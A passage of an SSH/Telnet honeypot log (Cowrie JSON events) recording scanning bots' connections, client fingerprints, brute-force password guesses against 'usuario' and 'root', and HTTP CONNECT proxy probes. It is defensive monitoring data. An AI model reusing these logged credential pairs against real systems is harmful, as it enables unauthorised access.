.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T07:50:26.104280Z","src_ip":"51.15.166.60","session":"a3294c4e589d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T07:50:26.248008Z","src_ip":"51.15.166.60","session":"a3294c4e589d"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:50:27.275624Z","src_ip":"51.15.166.60","session":"a3294c4e589d"}
{"eventid":"cowrie.session.connect","src_ip":"51.15.166.60","src_port":45208,"dst_ip":"1.2.3.4","dst_port":22,"session":"cfa45ed46530","protocol":"ssh","message":"New connection: 51.15.166.60:45208 (1.2.3.4:22) [session: cfa45ed46530]","sensor":"my-vps","timestamp":"2025-08-28T07:50:27.300380Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T07:50:27.301125Z","src_ip":"51.15.166.60","session":"cfa45ed46530"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T07:50:27.326835Z","src_ip":"51.15.166.60","session":"cfa45ed46530"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:50:27.471055Z","src_ip":"51.15.166.60","session":"cfa45ed46530"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:50:27.497556Z","src_ip":"51.15.166.60","session":"0055e2eefaa4"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:50:27.498682Z","src_ip":"51.15.166.60","session":"cfa45ed46530"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":23543,"dst_ip":"1.2.3.4","dst_port":22,"session":"3404f48bc948","protocol":"ssh","message":"New connection: 212.227.235.229:23543 (1.2.3.4:22) [session: 3404f48bc948]","sensor":"my-vps","timestamp":"2025-08-28T07:51:06.746362Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T07:51:06.747442Z","src_ip":"212.227.235.229","session":"3404f48bc948"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T07:51:06.877787Z","src_ip":"212.227.235.229","session":"3404f48bc948"}
{"eventid":"cowrie.login.failed","username":"usuario","password":"usuario","message":"login attempt [usuario/usuario] failed","sensor":"my-vps","timestamp":"2025-08-28T07:51:07.467067Z","src_ip":"212.227.235.229","session":"3404f48bc948"}
{"eventid":"cowrie.login.failed","username":"usuario","password":"abc123","message":"login attempt [usuario/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T07:51:08.594938Z","src_ip":"212.227.235.229","session":"3404f48bc948"}
{"eventid":"cowrie.login.failed","username":"usuario","password":"abcd123","message":"login attempt [usuario/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T07:51:09.723179Z","src_ip":"212.227.235.229","session":"3404f48bc948"}
{"eventid":"cowrie.login.failed","username":"usuario","password":"abcd1234","message":"login attempt [usuario/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T07:51:10.854040Z","src_ip":"212.227.235.229","session":"3404f48bc948"}
{"eventid":"cowrie.login.failed","username":"usuario","password":"abc1234","message":"login attempt [usuario/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T07:51:11.981842Z","src_ip":"212.227.235.229","session":"3404f48bc948"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:51:13.108625Z","src_ip":"212.227.235.229","session":"3404f48bc948"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36168,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa9699ad28ff","protocol":"ssh","message":"New connection: 212.227.235.229:36168 (1.2.3.4:22) [session: aa9699ad28ff]","sensor":"my-vps","timestamp":"2025-08-28T07:52:16.369296Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:52:16.370598Z","src_ip":"212.227.235.229","session":"aa9699ad28ff"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-28T07:52:16.473772Z","src_ip":"212.227.235.229","session":"aa9699ad28ff"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"04:ea:62:c7:5e:d2:d9:5e:10:03:fd:f2:6e:a0:a9:0f","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzml2PeIHOUG+78TIk0lQcR5JC/mlDElDtplEfq8KDiJFwD8z9Shhk2kG0pwzw9uUr7R24h8lnh9DWpiKfoy4MeMFrTO8akT1hXf4yn9IEEHdiq9hVz1ZkEnUdjyzuvXGIOcRe2FqQaovFY15gSDZzJc5K6NMT8uW1aitHAsYXZDW8uh+/SJAqcCCVUtVnZRj4nlhQxW2810CJGQQrixkkww7F/9XRlddH3HkNuRlZLQMk5oGHTxeySKKfqoAoXgZXac9VBAPRUU+0PrBrOSWlXFbGBPJSdvDfxBqcg4hguacD1EW0/5ORR7Ikp1i6y+gIpdydwxW51yAqrYqHI5iD","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 04:ea:62:c7:5e:d2:d9:5e:10:03:fd:f2:6e:a0:a9:0f","sensor":"my-vps","timestamp":"2025-08-28T07:52:16.681710Z","src_ip":"212.227.235.229","session":"aa9699ad28ff"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"04:ea:62:c7:5e:d2:d9:5e:10:03:fd:f2:6e:a0:a9:0f","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzml2PeIHOUG+78TIk0lQcR5JC/mlDElDtplEfq8KDiJFwD8z9Shhk2kG0pwzw9uUr7R24h8lnh9DWpiKfoy4MeMFrTO8akT1hXf4yn9IEEHdiq9hVz1ZkEnUdjyzuvXGIOcRe2FqQaovFY15gSDZzJc5K6NMT8uW1aitHAsYXZDW8uh+/SJAqcCCVUtVnZRj4nlhQxW2810CJGQQrixkkww7F/9XRlddH3HkNuRlZLQMk5oGHTxeySKKfqoAoXgZXac9VBAPRUU+0PrBrOSWlXFbGBPJSdvDfxBqcg4hguacD1EW0/5ORR7Ikp1i6y+gIpdydwxW51yAqrYqHI5iD","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T07:52:16.682275Z","src_ip":"212.227.235.229","session":"aa9699ad28ff"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"04:ea:62:c7:5e:d2:d9:5e:10:03:fd:f2:6e:a0:a9:0f","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzml2PeIHOUG+78TIk0lQcR5JC/mlDElDtplEfq8KDiJFwD8z9Shhk2kG0pwzw9uUr7R24h8lnh9DWpiKfoy4MeMFrTO8akT1hXf4yn9IEEHdiq9hVz1ZkEnUdjyzuvXGIOcRe2FqQaovFY15gSDZzJc5K6NMT8uW1aitHAsYXZDW8uh+/SJAqcCCVUtVnZRj4nlhQxW2810CJGQQrixkkww7F/9XRlddH3HkNuRlZLQMk5oGHTxeySKKfqoAoXgZXac9VBAPRUU+0PrBrOSWlXFbGBPJSdvDfxBqcg4hguacD1EW0/5ORR7Ikp1i6y+gIpdydwxW51yAqrYqHI5iD","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 04:ea:62:c7:5e:d2:d9:5e:10:03:fd:f2:6e:a0:a9:0f","sensor":"my-vps","timestamp":"2025-08-28T07:52:16.787321Z","src_ip":"212.227.235.229","session":"aa9699ad28ff"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"04:ea:62:c7:5e:d2:d9:5e:10:03:fd:f2:6e:a0:a9:0f","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzml2PeIHOUG+78TIk0lQcR5JC/mlDElDtplEfq8KDiJFwD8z9Shhk2kG0pwzw9uUr7R24h8lnh9DWpiKfoy4MeMFrTO8akT1hXf4yn9IEEHdiq9hVz1ZkEnUdjyzuvXGIOcRe2FqQaovFY15gSDZzJc5K6NMT8uW1aitHAsYXZDW8uh+/SJAqcCCVUtVnZRj4nlhQxW2810CJGQQrixkkww7F/9XRlddH3HkNuRlZLQMk5oGHTxeySKKfqoAoXgZXac9VBAPRUU+0PrBrOSWlXFbGBPJSdvDfxBqcg4hguacD1EW0/5ORR7Ikp1i6y+gIpdydwxW51yAqrYqHI5iD","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T07:52:16.787957Z","src_ip":"212.227.235.229","session":"aa9699ad28ff"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:52:26.369113Z","src_ip":"212.227.235.229","session":"aa9699ad28ff"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":28484,"dst_ip":"1.2.3.4","dst_port":22,"session":"82021f257dd6","protocol":"ssh","message":"New connection: 212.227.125.160:28484 (1.2.3.4:22) [session: 82021f257dd6]","sensor":"my-vps","timestamp":"2025-08-28T07:52:45.371902Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:52:46.186469Z","src_ip":"212.227.125.160","session":"82021f257dd6"}
{"eventid":"cowrie.client.kex","hassh":"9052c4ab4164c78256e71143dcfc7eac","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 9052c4ab4164c78256e71143dcfc7eac","sensor":"my-vps","timestamp":"2025-08-28T07:52:46.195623Z","src_ip":"212.227.125.160","session":"82021f257dd6"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:52:49.177142Z","src_ip":"212.227.125.160","session":"82021f257dd6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32346,"dst_ip":"1.2.3.4","dst_port":22,"session":"b4830708c253","protocol":"ssh","message":"New connection: 212.227.235.229:32346 (1.2.3.4:22) [session: b4830708c253]","sensor":"my-vps","timestamp":"2025-08-28T07:52:53.246546Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:52:53.760046Z","src_ip":"212.227.235.229","session":"b4830708c253"}
{"eventid":"cowrie.client.kex","hassh":"9052c4ab4164c78256e71143dcfc7eac","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 9052c4ab4164c78256e71143dcfc7eac","sensor":"my-vps","timestamp":"2025-08-28T07:52:53.760772Z","src_ip":"212.227.235.229","session":"b4830708c253"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:52:55.124549Z","src_ip":"212.227.235.229","session":"b4830708c253"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38226,"dst_ip":"1.2.3.4","dst_port":23,"session":"102114b05bef","protocol":"telnet","message":"New connection: 212.227.235.229:38226 (1.2.3.4:23) [session: 102114b05bef]","sensor":"my-vps","timestamp":"2025-08-28T07:53:03.236847Z"}
{"eventid":"cowrie.session.closed","duration":12.715225458145142,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:53:15.951998Z","src_ip":"212.227.235.229","session":"102114b05bef"}
{"eventid":"cowrie.session.connect","src_ip":"204.76.203.28","src_port":44308,"dst_ip":"1.2.3.4","dst_port":22,"session":"911144246a43","protocol":"ssh","message":"New connection: 204.76.203.28:44308 (1.2.3.4:22) [session: 911144246a43]","sensor":"my-vps","timestamp":"2025-08-28T07:54:32.759847Z"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:54:35.216228Z","src_ip":"204.76.203.28","session":"911144246a43"}
{"eventid":"cowrie.session.connect","src_ip":"204.76.203.28","src_port":61942,"dst_ip":"1.2.3.4","dst_port":22,"session":"b16e59551d6e","protocol":"ssh","message":"New connection: 204.76.203.28:61942 (1.2.3.4:22) [session: b16e59551d6e]","sensor":"my-vps","timestamp":"2025-08-28T07:54:36.525016Z"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:54:39.857877Z","src_ip":"204.76.203.28","session":"b16e59551d6e"}
{"eventid":"cowrie.session.connect","src_ip":"204.76.203.28","src_port":65112,"dst_ip":"1.2.3.4","dst_port":22,"session":"1614b639f6ce","protocol":"ssh","message":"New connection: 204.76.203.28:65112 (1.2.3.4:22) [session: 1614b639f6ce]","sensor":"my-vps","timestamp":"2025-08-28T07:54:44.320870Z"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:54:48.261037Z","src_ip":"204.76.203.28","session":"1614b639f6ce"}
{"eventid":"cowrie.session.connect","src_ip":"204.76.203.28","src_port":65118,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec4669627153","protocol":"ssh","message":"New connection: 204.76.203.28:65118 (1.2.3.4:22) [session: ec4669627153]","sensor":"my-vps","timestamp":"2025-08-28T07:54:51.298422Z"}
{"eventid":"cowrie.client.version","version":"CONNECT 204.76.203.28:80 HTTP/1.0","message":"Remote SSH version: CONNECT 204.76.203.28:80 HTTP/1.0","sensor":"my-vps","timestamp":"2025-08-28T07:54:53.475359Z","src_ip":"204.76.203.28","session":"ec4669627153"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:54:53.478227Z","src_ip":"204.76.203.28","session":"ec4669627153"}
{"eventid":"cowrie.session.connect","src_ip":"204.76.203.28","src_port":51430,"dst_ip":"1.2.3.4","dst_port":22,"session":"b49d19ba3d6c","protocol":"ssh","message":"New connection: 204.76.203.28:51430 (1.2.3.4:22) [session: b49d19ba3d6c]","sensor":"my-vps","timestamp":"2025-08-28T07:55:09.210692Z"}
{"eventid":"cowrie.client.version","version":"CONNECT 204.76.203.28:80 HTTP/1.0","message":"Remote SSH version: CONNECT 204.76.203.28:80 HTTP/1.0","sensor":"my-vps","timestamp":"2025-08-28T07:55:11.066633Z","src_ip":"204.76.203.28","session":"b49d19ba3d6c"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:55:11.067900Z","src_ip":"204.76.203.28","session":"b49d19ba3d6c"}
{"eventid":"cowrie.session.connect","src_ip":"204.76.203.28","src_port":44928,"dst_ip":"1.2.3.4","dst_port":22,"session":"69e051d60a52","protocol":"ssh","message":"New connection: 204.76.203.28:44928 (1.2.3.4:22) [session: 69e051d60a52]","sensor":"my-vps","timestamp":"2025-08-28T07:55:14.756066Z"}
{"eventid":"cowrie.client.version","version":"CONNECT 204.76.203.28:80 HTTP/1.0","message":"Remote SSH version: CONNECT 204.76.203.28:80 HTTP/1.0","sensor":"my-vps","timestamp":"2025-08-28T07:55:16.958185Z","src_ip":"204.76.203.28","session":"69e051d60a52"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:55:16.959479Z","src_ip":"204.76.203.28","session":"69e051d60a52"}
{"eventid":"cowrie.session.connect","src_ip":"204.76.203.28","src_port":44956,"dst_ip":"1.2.3.4","dst_port":22,"session":"97c0d3db8a57","protocol":"ssh","message":"New connection: 204.76.203.28:44956 (1.2.3.4:22) [session: 97c0d3db8a57]","sensor":"my-vps","timestamp":"2025-08-28T07:55:20.226454Z"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:55:23.190178Z","src_ip":"204.76.203.28","session":"97c0d3db8a57"}
{"eventid":"cowrie.session.connect","src_ip":"204.76.203.28","src_port":20806,"dst_ip":"1.2.3.4","dst_port":22,"session":"43e812efe4f8","protocol":"ssh","message":"New connection: 204.76.203.28:20806 (1.2.3.4:22) [session: 43e812efe4f8]","sensor":"my-vps","timestamp":"2025-08-28T07:55:25.637752Z"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:55:27.659643Z","src_ip":"204.76.203.28","session":"43e812efe4f8"}
